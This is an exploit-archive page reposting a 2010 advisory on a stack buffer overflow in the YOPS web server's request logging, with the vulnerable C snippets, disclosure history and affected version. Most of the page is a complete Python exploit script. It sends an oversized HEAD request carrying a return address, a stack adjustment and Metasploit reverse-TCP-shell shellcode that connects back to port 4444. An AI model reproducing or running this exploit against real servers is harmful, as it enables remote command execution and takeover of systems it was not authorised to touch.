Home / os / win7

YOPS Web Server Remote Command Execution

Posted on 11 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>YOPS Web Server Remote Command Execution</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================
YOPS Web Server Remote Command Execution
========================================

 - YOPS (Your Open Personal [WEB] Server)
 
[Vendor Product Description]
 
 - YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C. There are 7 stages (accept, parse,
launch, fetch, error, send and log), and pipes are used as interstage
channels.
 
[Bug Description]
 
 - In function http_parse_request_header the application fails to do a
boundary check for a malformed buffer received as a HTTP command
(HEAD/GET/POST), prior to use it as input for logger variable at
swebs_record_log function.
 
 --- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
       int r;
       int ver, rev;
       char *s, *tok, *l, *prm;
[...]
       r = sscanf(h-&gt;http, &quot; HTTP/%d.%d &quot;, &amp;ver, &amp;rev);
       if (r != 2)
               return -400;
[...]
}
 --- END snippet ---
 
 --- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
       int err;
       time_t now;
       char timestr[32];
       char logrec[MAX_REQUEST_LINE_LEN + 1];
[...]
       sprintf (
               logrec,
               &quot;%s	[%s]	&quot;%s&quot;	(%d+%d/%d)	%d&quot;,
               job-&gt;client,
               timestr,
               job-&gt;hdr.request_line,
               job-&gt;response_hlen,
               job-&gt;response_blen_sent,
               job-&gt;response_blen,
               job-&gt;status
               );
[...]
}
 --- END snippet ---
 
[History]
 
 - Advisory sent to vendor on 08/26/2010
 
[Impact]
 
 - High (Remote Command Execution)
 
[Affected Version]
 
 - YOPS 2009-11-30
 
 - Prior versions may also be vulnerable
 
[Code]
 
#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu &lt;AT&gt; dclabs &lt;DOT&gt; com &lt;DOT&gt; br
 
HOST = &quot;localhost&quot;
PORT = 8888
 
import socket
import sys
import time
 
try:
BUFF_LEN = int(sys.argv[1])
except:
BUFF_LEN = 802
FIXUP_ADDR = &quot;x47xcex04x08&quot;
 
shellcode = (
# MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
&quot;x33xc9xb1x13xbexaex88x55xcbxdaxcdxd9x74x24xf4&quot;
&quot;x5fx31x77x0ex03x77x0ex83x69x8cxb7x3ex44x56xc0&quot;
&quot;x22xf5x2bx7cxcfxfbx22x63xbfx9dxf9xe4x9bx3fx6a&quot;
&quot;x9ax1bxbfx6bx02x74xaex37xacxd7xbaxd7x61x88xb3&quot;
&quot;x39xc2x42xa5xe1x08x12x70x95x4axa3xbdx54xecx8d&quot;
&quot;xb8x9fxbdx65x15x4fx4dx1ex01xa0xd3xb7xbfx37xf0&quot;
&quot;x18x6cxc1x16x28x99x1cx58x43&quot;
)
 
buffer = &quot;HEAD &quot;
buffer += &quot;A&quot;*BUFF_LEN
buffer += FIXUP_ADDR*4
buffer += &quot; HTTP/1.1&quot;
 
stackadjust = (
&quot;xcb&quot; # instruction alignment
&quot;xbcx69x69x96xb0&quot; # Stack Adjustment
)
 
payload = buffer + stackadjust + shellcode + &quot;

&quot;
 
print &quot;&quot;&quot;
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
&quot;&quot;&quot;
 
print &quot; [+] Using BUFF_LEN -&gt; &quot;, str(BUFF_LEN)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print &quot; [+] Trying to establish connection...&quot;
s.connect((HOST, PORT))
print &quot; [+] Sending a dummy request to initialize data...&quot;
s.send(&quot;HEAD DcLabs HTTP/1.1

&quot;)
try:
s.recv(1024)
except:
pass
s.close()
 
time.sleep(3)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print &quot; [+] Sending our malicious payload...&quot;
s.send(payload)
print &quot; [+] Payload sent, good luck!&quot;
s.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :